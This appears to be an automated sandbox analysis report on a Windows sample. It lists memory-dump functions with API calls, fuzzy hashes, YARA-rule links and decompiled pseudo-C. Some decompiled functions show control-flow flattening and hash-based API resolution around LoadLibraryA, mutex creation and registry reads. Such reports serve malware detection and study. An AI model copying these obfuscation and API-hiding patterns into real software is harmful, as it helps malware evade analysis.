                                                                                                                                                        Function 00007FFD696AF8C4, Relevance: 18.1, APIs: 12, Instructions: 133COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3885183344-0
                                                                                                                                                        • Opcode ID: dce21416953a63e4cd65027267813f30f6dd41bfac184dd409308fef620cfa1d
                                                                                                                                                        • Instruction ID: 1142f07b928331b907fb56aa8b148ba33693e9773c0930307f27f17b715c142e
                                                                                                                                                        • Opcode Fuzzy Hash: dce21416953a63e4cd65027267813f30f6dd41bfac184dd409308fef620cfa1d
                                                                                                                                                        • Instruction Fuzzy Hash: 2251BD61F0CF43D6FA10AFE5A9722B92690AF4638CF444036E54D4329BEE3DE455A303
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696B4574, Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FFD696B1FCB), ref: 00007FFD696B458D
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFD696B1FCB), ref: 00007FFD696B45EF
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFD696B1FCB), ref: 00007FFD696B4629
                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFD696B1FCB), ref: 00007FFD696B4653
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1557788787-0
                                                                                                                                                        • Opcode ID: e23d25e9923bc348d38db6fd334f4b2d81dbd54319081587aee838d2b463a19b
                                                                                                                                                        • Instruction ID: 68832ae448a66a24ab7a768811f3283c85956f07de843a4474670cece53251e2
                                                                                                                                                        • Opcode Fuzzy Hash: e23d25e9923bc348d38db6fd334f4b2d81dbd54319081587aee838d2b463a19b
                                                                                                                                                        • Instruction Fuzzy Hash: 5B216461F18F91C1EA208F56A56002966A4BB54BD4B484235DE9E63BDCEF7CD4628301
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 012DEFD3, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                                        			E012DEFD3(intOrPtr __edx, long long __rax, long long __rcx, void* __rdx, void* __r8, void* __r11) {
				long long _v72;
				long long _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				long long _v104;
				long long _v112;
				intOrPtr _t24;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t44;
				void* _t46;
				long long _t56;
				long long _t61;
				void* _t63;
				long long _t64;
				long long _t66;
				void* _t68;
				void* _t69;
				long long _t70;

				_t69 = __r11;
				_t68 = __r8;
				_t63 = __rdx;
				_t62 = __rcx;
				_t56 = __rax;
				_t66 = __rcx;
				_v84 = r8d;
				_t34 =  ==  ? 0x64798daa : 0x23a3853d;
				_v88 =  ==  ? 0x64798daa : 0x23a3853d;
				r13d = 0x8f34f1b0;
				r13d =  ==  ? 0x84c104ed : r13d;
				_v92 = __edx;
				r14d = 0x71c9cf43;
				r14d =  ==  ? 0xf3019199 : r14d;
				_t24 = 0xf82b818e;
				while(1) {
					L1:
					_t35 = _t24;
					if(_t24 <= 0x18bc41aa) {
						break;
					}
					if(_t35 > 0x38ab292f) {
						if(_t35 > 0x65e67dfa) {
							if(_t35 == 0x71c9cf43) {
								r12d = 0;
								_t64 = _t66;
								_t24 = r13d;
								continue;
							}
							_t24 = _t35;
							if(_t35 != 0x65e67dfb) {
								continue;
							}
							return _t24;
						}
						if(_t35 == 0x38ab2930) {
							_t56 = _v112;
							_t24 = 0x98ea932f;
							if( *_t56 != 0) {
								_t24 = 0x33675366;
							}
							L40:
							_t61 = _v104;
							continue;
						}
						_t24 = _t35;
						if(_t35 == 0x64798daa) {
							_t24 = 0x65e67dfb;
						}
						continue;
					}
					if(_t35 > 0x2f447a17) {
						if(_t35 == 0x2f447a18) {
							_t24 = 0xfaff49ef;
							continue;
						}
						_t24 = _t35;
						if(_t35 != 0x33675366) {
							continue;
						}
						r8d = 0x18d1ea71;
						r9d = 0x2b;
						E012DFAD7(1, 0, _t56, _t62);
						_t62 = _v112;
						 *_t56();
						_t61 = _t56;
						_t24 = 0x18bc41ab;
						if(_t61 == 0) {
							continue;
						}
						L32:
						_t24 = 0x98ea932f;
						continue;
					}
					if(_t35 == 0x18bc41ab) {
						r8d = 0x84161500;
						r9d = 2;
						E012DFAD7(1, 0, _t56, _t62);
						_t62 = _v112; // executed
						LoadLibraryA(??); // executed
						goto L32;
					} else {
						_t24 = _t35;
						if(_t35 == 0x23a3853d) {
							_t62 = _v72;
							E012DF29F(_v84, _t44, _t46, _v72, _t63, _t68, _t69);
							_v80 = _t56;
							_t24 = 0xe79882b1;
							if(_v80 != 0) {
								_t24 = 0x2f447a18;
							}
						}
						continue;
					}
				}
				if(_t35 <= 0xe79882b0) {
					if(_t35 == 0x84c104ed) {
						E012DF5B9(_v92);
						_t64 = _t56;
						_t24 = 0x8f34f1b0;
						r12d = 0;
						goto L1;
					}
					if(_t35 == 0x8f34f1b0) {
						_v104 = _t70;
						_v112 = _t64;
						_t62 = _v104;
						_t43 = 0x38ab2930;
						if(_v112 == _t61) {
							_t43 = 0x98ea932f;
						}
						_t24 =  ==  ? _t43 : 0x98ea932f;
						goto L40;
					}
					_t24 = _t35;
					if(_t35 == 0x98ea932f) {
						_v72 = _t61;
						_t24 = _v88;
					}
				} else {
					if(_t35 > 0xf82b818d) {
						_t24 = r14d;
						if(_t35 != 0xf82b818e) {
							_t24 = _t35;
							if(_t35 == 0xfaff49ef) {
								_t24 = 0x65e67dfb;
							}
						}
					} else {
						if(_t35 == 0xe79882b1) {
							_t24 = 0xfaff49ef;
						} else {
							_t24 = _t35;
							if(_t35 == 0xf3019199) {
								_t24 = 0x8f34f1b0;
								_t70 =  *0x12e5030;
								_t64 = _t66;
							}
						}
					}
				}
			}























                                                                                                                                                        0x012defd3
                                                                                                                                                        0x012defd3
                                                                                                                                                        0x012defd3
                                                                                                                                                        0x012defd3
                                                                                                                                                        0x012defd3
                                                                                                                                                        0x012defe3
                                                                                                                                                        0x012defe6
                                                                                                                                                        0x012deff8
                                                                                                                                                        0x012deffb
                                                                                                                                                        0x012df007
                                                                                                                                                        0x012df00d
                                                                                                                                                        0x012df011
                                                                                                                                                        0x012df01d
                                                                                                                                                        0x012df023
                                                                                                                                                        0x012df027
                                                                                                                                                        0x012df02c
                                                                                                                                                        0x012df02c
                                                                                                                                                        0x012df02c
                                                                                                                                                        0x012df033
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012df03b
                                                                                                                                                        0x012df0d2
                                                                                                                                                        0x012df1b4
                                                                                                                                                        0x012df27d
                                                                                                                                                        0x012df280
                                                                                                                                                        0x012df283
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012df283
                                                                                                                                                        0x012df1ba
                                                                                                                                                        0x012df1c2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012df29e
                                                                                                                                                        0x012df29e
                                                                                                                                                        0x012df0de
                                                                                                                                                        0x012df208
                                                                                                                                                        0x012df210
                                                                                                                                                        0x012df215
                                                                                                                                                        0x012df217
                                                                                                                                                        0x012df217
                                                                                                                                                        0x012df264
                                                                                                                                                        0x012df264
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012df264
                                                                                                                                                        0x012df0e4
                                                                                                                                                        0x012df0ec
                                                                                                                                                        0x012df0f7
                                                                                                                                                        0x012df0f7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012df0ec
                                                                                                                                                        0x012df047
                                                                                                                                                        0x012df13b
                                                                                                                                                        0x012df26e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012df273
                                                                                                                                                        0x012df141
                                                                                                                                                        0x012df149
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012df15b
                                                                                                                                                        0x012df161
                                                                                                                                                        0x012df167
                                                                                                                                                        0x012df16c
                                                                                                                                                        0x012df16f
                                                                                                                                                        0x012df171
                                                                                                                                                        0x012df174
                                                                                                                                                        0x012df17c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012df1f2
                                                                                                                                                        0x012df1f2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012df1f2
                                                                                                                                                        0x012df053
                                                                                                                                                        0x012df1d9
                                                                                                                                                        0x012df1df
                                                                                                                                                        0x012df1e5
                                                                                                                                                        0x012df1ea
                                                                                                                                                        0x012df1ed
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012df059
                                                                                                                                                        0x012df059
                                                                                                                                                        0x012df061
                                                                                                                                                        0x012df063
                                                                                                                                                        0x012df06c
                                                                                                                                                        0x012df071
                                                                                                                                                        0x012df07c
                                                                                                                                                        0x012df081
                                                                                                                                                        0x012df083
                                                                                                                                                        0x012df083
                                                                                                                                                        0x012df081
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012df061
                                                                                                                                                        0x012df053
                                                                                                                                                        0x012df090
                                                                                                                                                        0x012df107
                                                                                                                                                        0x012df222
                                                                                                                                                        0x012df227
                                                                                                                                                        0x012df22a
                                                                                                                                                        0x012df22f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012df22f
                                                                                                                                                        0x012df113
                                                                                                                                                        0x012df237
                                                                                                                                                        0x012df23c
                                                                                                                                                        0x012df241
                                                                                                                                                        0x012df246
                                                                                                                                                        0x012df257
                                                                                                                                                        0x012df259
                                                                                                                                                        0x012df259
                                                                                                                                                        0x012df261
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012df261
                                                                                                                                                        0x012df119
                                                                                                                                                        0x012df121
                                                                                                                                                        0x012df127
                                                                                                                                                        0x012df12c
                                                                                                                                                        0x012df12c
                                                                                                                                                        0x012df092
                                                                                                                                                        0x012df098
                                                                                                                                                        0x012df184
                                                                                                                                                        0x012df18d
                                                                                                                                                        0x012df193
                                                                                                                                                        0x012df19b
                                                                                                                                                        0x012df1a1
                                                                                                                                                        0x012df1a6
                                                                                                                                                        0x012df19b
                                                                                                                                                        0x012df09e
                                                                                                                                                        0x012df0a4
                                                                                                                                                        0x012df1fc
                                                                                                                                                        0x012df0aa
                                                                                                                                                        0x012df0aa
                                                                                                                                                        0x012df0b2
                                                                                                                                                        0x012df0b8
                                                                                                                                                        0x012df0bd
                                                                                                                                                        0x012df0c4
                                                                                                                                                        0x012df0c4
                                                                                                                                                        0x012df0b2
                                                                                                                                                        0x012df0a4
                                                                                                                                                        0x012df098

                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,EA203201,079849AE,E8F2AD3B,00000095,?,?,00000001,012DFC0A,?,?,079849AE,E8F2AD3B), ref: 012DF1ED
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.368911222.00000000012D1000.00000020.00000001.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.368893013.00000000012D0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368940818.00000000012E4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368999147.00000000012E7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                        • String ID: fSg3$fSg3
                                                                                                                                                        • API String ID: 1029625771-263991881
                                                                                                                                                        • Opcode ID: 3d0265caa5a6fd1482380c2ac525c3344cc87223c6ea81e310f15978c367fdea
                                                                                                                                                        • Instruction ID: 034cd1ac8b46e909a0acd379aa7a3e70e3f24ff08ba8627d68de6a6c914ad18b
                                                                                                                                                        • Opcode Fuzzy Hash: 3d0265caa5a6fd1482380c2ac525c3344cc87223c6ea81e310f15978c367fdea
                                                                                                                                                        • Instruction Fuzzy Hash: 14512821334551C6DB28853DFAA523965A0BB557E4F68802AFF4BCBF18D66DC8438718
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696AE85B, Relevance: 5.0, APIs: 3, Instructions: 462memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Virtual$HeapProtect$AllocFreeProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1780707458-0
                                                                                                                                                        • Opcode ID: e003006eba0220ca3cf5e85d95ded9ea3350dc4a32857c35433f8b55746bfd22
                                                                                                                                                        • Instruction ID: a7d13b0a8e5ef55d9d22a4142ff11c228ff4f9b2bfa37f64907b235613ccb7ab
                                                                                                                                                        • Opcode Fuzzy Hash: e003006eba0220ca3cf5e85d95ded9ea3350dc4a32857c35433f8b55746bfd22
                                                                                                                                                        • Instruction Fuzzy Hash: EC225026F0CB81C6E679DF95A1A037D77A1EB84758F10403AEA8E47BD5DE3CD8409B42
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696B005C, Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __isa_available_init.LIBCMT ref: 00007FFD696B0079
                                                                                                                                                        • __vcrt_initialize.LIBVCRUNTIME ref: 00007FFD696B007E
                                                                                                                                                          • Part of subcall function 00007FFD696B0DD4: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FFD696B0DD8
                                                                                                                                                          • Part of subcall function 00007FFD696B0DD4: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FFD696B0DDD
                                                                                                                                                          • Part of subcall function 00007FFD696B0DD4: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FFD696B0DE2
                                                                                                                                                        • __vcrt_uninitialize.LIBVCRUNTIME ref: 00007FFD696B0096
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3388242289-0
                                                                                                                                                        • Opcode ID: 47de4b69c5c424f3e0c8bb8d14ec70d0aaa5cd25fe8f1cb13ccdb4e85951ea84
                                                                                                                                                        • Instruction ID: cc62e68c1b3f9e6df7b69c92068e8501bef4f47368c23b739f4f899a78c81499
                                                                                                                                                        • Opcode Fuzzy Hash: 47de4b69c5c424f3e0c8bb8d14ec70d0aaa5cd25fe8f1cb13ccdb4e85951ea84
                                                                                                                                                        • Instruction Fuzzy Hash: 86E0E5C0F4DB82C5FE642EE512722B91E801F29348F400079E8AD4218FEE0EB46A5623
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 012D3A22, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63synchronizationCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                        			E012D3A22(long long __rax, intOrPtr __rcx, long long* __rdx) {
				long long _v32;
				intOrPtr _v36;
				signed char _t12;
				void* _t18;
				void* _t26;
				long long _t31;
				long long* _t36;

				_t32 = __rcx;
				_t31 = __rax;
				_t36 = __rdx;
				r8d = 0x7ae3257e;
				r9d = 0x42;
				E012DFAD7(1, _t26, __rax, __rcx);
				 *_t31(); // executed
				_v32 = _t31;
				r8d = 0xce1f1c4e;
				r9d = 0xc5;
				E012DFAD7(1, _t26, _t31, __rcx);
				_v36 =  *_t31();
				_t18 = 0x953bce87;
				L1:
				while(_t18 > 0x346ca2b9) {
					if(_t18 == 0x346ca2ba) {
						r8d = 0x2db58ff7;
						r9d = 0x11;
						E012DFAD7(1, _t26, _t31, _t32);
						_t32 = _v32;
						 *_t31();
						_t18 = 0x6b45cfdb;
						_t12 = 1;
						continue;
					}
					if(_t18 != 0x6b45cfdb) {
						continue;
					}
					return _t12 & 0x00000001;
				}
				if(_t18 == 0x953bce87) {
					_t18 =  ==  ? 0x346ca2ba : 0x263eb76d;
				} else {
					if(_t18 == 0x263eb76d) {
						_t31 = _v32;
						 *_t36 = _t31;
						_t18 = 0x6b45cfdb;
						_t12 = 0;
					}
				}
				goto L1;
			}










                                                                                                                                                        0x012d3a22
                                                                                                                                                        0x012d3a22
                                                                                                                                                        0x012d3a29
                                                                                                                                                        0x012d3a36
                                                                                                                                                        0x012d3a3c
                                                                                                                                                        0x012d3a42
                                                                                                                                                        0x012d3a4e
                                                                                                                                                        0x012d3a50
                                                                                                                                                        0x012d3a5c
                                                                                                                                                        0x012d3a62
                                                                                                                                                        0x012d3a68
                                                                                                                                                        0x012d3a6f
                                                                                                                                                        0x012d3a73
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d3a7d
                                                                                                                                                        0x012d3aac
                                                                                                                                                        0x012d3ad8
                                                                                                                                                        0x012d3ade
                                                                                                                                                        0x012d3ae4
                                                                                                                                                        0x012d3ae9
                                                                                                                                                        0x012d3aec
                                                                                                                                                        0x012d3aee
                                                                                                                                                        0x012d3af3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d3af3
                                                                                                                                                        0x012d3ab4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d3b00
                                                                                                                                                        0x012d3b00
                                                                                                                                                        0x012d3a8b
                                                                                                                                                        0x012d3ac7
                                                                                                                                                        0x012d3a8d
                                                                                                                                                        0x012d3a93
                                                                                                                                                        0x012d3a95
                                                                                                                                                        0x012d3a9a
                                                                                                                                                        0x012d3a9d
                                                                                                                                                        0x012d3aa2
                                                                                                                                                        0x012d3aa2
                                                                                                                                                        0x012d3a93
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • CreateMutexExA.KERNEL32(?,?,?,079849AE,0701B759,012E09DE), ref: 012D3A4E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.368911222.00000000012D1000.00000020.00000001.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.368893013.00000000012D0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368940818.00000000012E4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368999147.00000000012E7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateMutex
                                                                                                                                                        • String ID: ~%z
                                                                                                                                                        • API String ID: 1964310414-678350322
                                                                                                                                                        • Opcode ID: eaccdd7afe8a9bf82b3a989abbb9c357d09fd32216fee824b4d664ec0fc315d5
                                                                                                                                                        • Instruction ID: 6e2b8c7388252ece0917834823f6b6e154d76d1973b9d7bb075551c012ce1ac8
                                                                                                                                                        • Opcode Fuzzy Hash: eaccdd7afe8a9bf82b3a989abbb9c357d09fd32216fee824b4d664ec0fc315d5
                                                                                                                                                        • Instruction Fuzzy Hash: D6112BA3B3858142D73C8A19F9B1A792682A7987C4F08012DDA0F9BF94C859C9824703
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 012D7B43, Relevance: 1.7, APIs: 1, Instructions: 213registryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 44%
                                                                                                                                                        			E012D7B43(intOrPtr __edx, long long __rax, void* __rcx) {
				long long _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				void* _v104;
				long long _v112;
				signed long long _v120;
				long long _v128;
				long long _v136;
				intOrPtr _v140;
				long long _v152;
				char _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v181;
				long long _v192;
				long long _v200;
				void* _t69;
				intOrPtr _t108;
				long long _t115;
				signed long long _t123;
				intOrPtr* _t131;
				void* _t140;
				void* _t144;
				void* _t146;
				signed long long _t147;
				long long _t148;

				_t115 = __rax;
				_t144 =  &_v168;
				_t108 = __edx;
				_t140 = __rcx;
				E012DCDB9(0xc8, __rax);
				_v152 = _t115;
				_t131 =  &_v180;
				_v136 = _t131;
				 *_t131 = 0;
				_v128 =  &_v160;
				_v88 = _t140 + 0xb44;
				_v96 = _t140 + 0x294;
				_v104 = _t140 + 0x280;
				_v140 = _t108;
				r12d = 0xf11b687f;
				r12d =  ==  ? 0xf83e1c76 : r12d;
				r15d = 0x5c7553b0;
				r15d =  ==  ? 0xdab00bc5 : r15d;
				_t15 = _t140 + 0x5d2; // 0x5c755982
				_v112 = _t15;
				_t17 = _t140 + 0x650; // 0x5c755a00
				_t123 = _t17;
				_v120 = _t123;
				_t69 = 0xbda386ba;
				L1:
				while(1) {
					while(_t69 > 0xdab00bc4) {
						if(_t69 <= 0xf83e1c75) {
							if(_t69 == 0xdab00bc5) {
								 *((short*)(_t140 + 0x294)) = 0;
								_v180 =  *((intOrPtr*)(_t140 + 0x664));
								_t69 = 0x5c7553b0;
								_t147 = _v104;
								_t148 = _v96;
								continue;
							}
							if(_t69 == 0xe6671123) {
								_t69 =  !=  ? 0x9491a652 : 0x1c0ab71e;
								continue;
							}
							if(_t69 != 0xf11b687f) {
								continue;
							}
							L29:
							_t69 = 0xd22e7491;
							continue;
						}
						if(_t69 > 0x38db78b6) {
							if(_t69 == 0x38db78b7) {
								r13d = 0;
								r14d = 0;
								_t69 = r15d;
								continue;
							}
							if(_t69 != 0x5c7553b0) {
								continue;
							}
							_v80 = _t147;
							_v72 = _t148;
							_v176 = 0;
							_v172 = 0x4cf804b1;
							_v168 = 0x5dec0a95;
							_v164 = 0x38ed4ebe;
							if(_v176 != 0) {
								L25:
								E012E020E(_t123, _v152,  &_v172, _v88, _t146);
								r8d = 0x6e0c8ed2;
								r9d = 0xd6;
								E012DFAD7(2, _t108, _t123, _v152);
								_t41 =  &_v160; // 0xf11b68c7
								_v200 = _t41;
								r8d = 0;
								r9d = 0x20019; // executed
								RegOpenKeyExA(??, ??, ??, ??, ??); // executed
								_t131 = _v152;
								E012DCC2E(_t123, _t131);
								_t69 =  ==  ? 0xc40b2334 : 0xbedb4fc6;
								continue;
							}
							do {
								 *(_t144 + 0x38 + _t123 * 4) = ( *(_t144 + 0x38 + _t123 * 4) & 0xfeab8f08 |  !( *(_t144 + 0x38 + _t123 * 4)) & 0x015470f7) ^ 0x39ca1b15;
								_t131 = _t131 + 1;
								_t123 = _t123 + 1;
							} while (_t123 != 4);
							goto L25;
						} else {
							if(_t69 == 0xf83e1c76) {
								 *((intOrPtr*)(_t140 + 0x664)) = _v180;
								_t69 = 0xf11b687f;
							} else {
								if(_t69 == 0x1c0ab71e) {
									_t69 = r12d;
								}
							}
							continue;
						}
					}
					if(_t69 <= 0xbda386b9) {
						if(_t69 == 0x8f6e5d8a) {
							goto L29;
						}
						if(_t69 == 0x9491a652) {
							 *((intOrPtr*)(_t140 + 0x638)) = _v180;
							_t69 = 0xf11b687f;
						} else {
							if(_t69 == 0xa8bc8896) {
								 *((short*)(_t140 + 0x5d2)) = 0;
								_v180 =  *((intOrPtr*)(_t140 + 0x638));
								_t69 = 0x5c7553b0;
								_t147 = _v120;
								_t148 = _v112;
							}
						}
						continue;
					}
					if(_t69 > 0xc40b2333) {
						if(_t69 == 0xc40b2334) {
							r8d = 0xbdd87e1e;
							r9d = 0xde;
							E012DFAD7(2, _t108, _t123, _t131);
							_t60 =  &_v180; // 0xf11b68b3
							_v192 = _t60;
							_v200 = _v72;
							r8d = 0;
							r9d = 0;
							 *_t123();
							r8d = 0x96bc22d6;
							r9d = 0xe0;
							E012DFAD7(2, _t108, _t123, _v160);
							_t131 = _v160;
							 *_t123();
							_t69 =  ==  ? 0xe6671123 : 0x8f6e5d8a;
							continue;
						}
						if(_t69 != 0xd22e7491) {
							continue;
						}
						return _t69;
					}
					if(_t69 == 0xbda386ba) {
						_v181 = _v140 == 1;
						_t69 =  !=  ? 0xa8bc8896 : 0x38db78b7;
						continue;
					}
					if(_t69 != 0xbedb4fc6) {
						continue;
					}
					goto L29;
				}
			}

































                                                                                                                                                        0x012d7b43
                                                                                                                                                        0x012d7b4f
                                                                                                                                                        0x012d7b56
                                                                                                                                                        0x012d7b58
                                                                                                                                                        0x012d7b60
                                                                                                                                                        0x012d7b65
                                                                                                                                                        0x012d7b6a
                                                                                                                                                        0x012d7b6f
                                                                                                                                                        0x012d7b79
                                                                                                                                                        0x012d7b84
                                                                                                                                                        0x012d7b95
                                                                                                                                                        0x012d7ba4
                                                                                                                                                        0x012d7bb3
                                                                                                                                                        0x012d7bbb
                                                                                                                                                        0x012d7bc7
                                                                                                                                                        0x012d7bcd
                                                                                                                                                        0x012d7bd6
                                                                                                                                                        0x012d7bdc
                                                                                                                                                        0x012d7be0
                                                                                                                                                        0x012d7be7
                                                                                                                                                        0x012d7bec
                                                                                                                                                        0x012d7bec
                                                                                                                                                        0x012d7bf3
                                                                                                                                                        0x012d7bf8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7bfd
                                                                                                                                                        0x012d7bfd
                                                                                                                                                        0x012d7c09
                                                                                                                                                        0x012d7c5b
                                                                                                                                                        0x012d7e0b
                                                                                                                                                        0x012d7e1a
                                                                                                                                                        0x012d7e1e
                                                                                                                                                        0x012d7e23
                                                                                                                                                        0x012d7e2b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7e2b
                                                                                                                                                        0x012d7c66
                                                                                                                                                        0x012d7e47
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7e47
                                                                                                                                                        0x012d7c71
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7dcc
                                                                                                                                                        0x012d7dcc
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7dcc
                                                                                                                                                        0x012d7c10
                                                                                                                                                        0x012d7cc5
                                                                                                                                                        0x012d7e63
                                                                                                                                                        0x012d7e66
                                                                                                                                                        0x012d7e69
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d7e69
                                                                                                                                                        0x012d7cd0
                                                                                                                                                        0x00000000
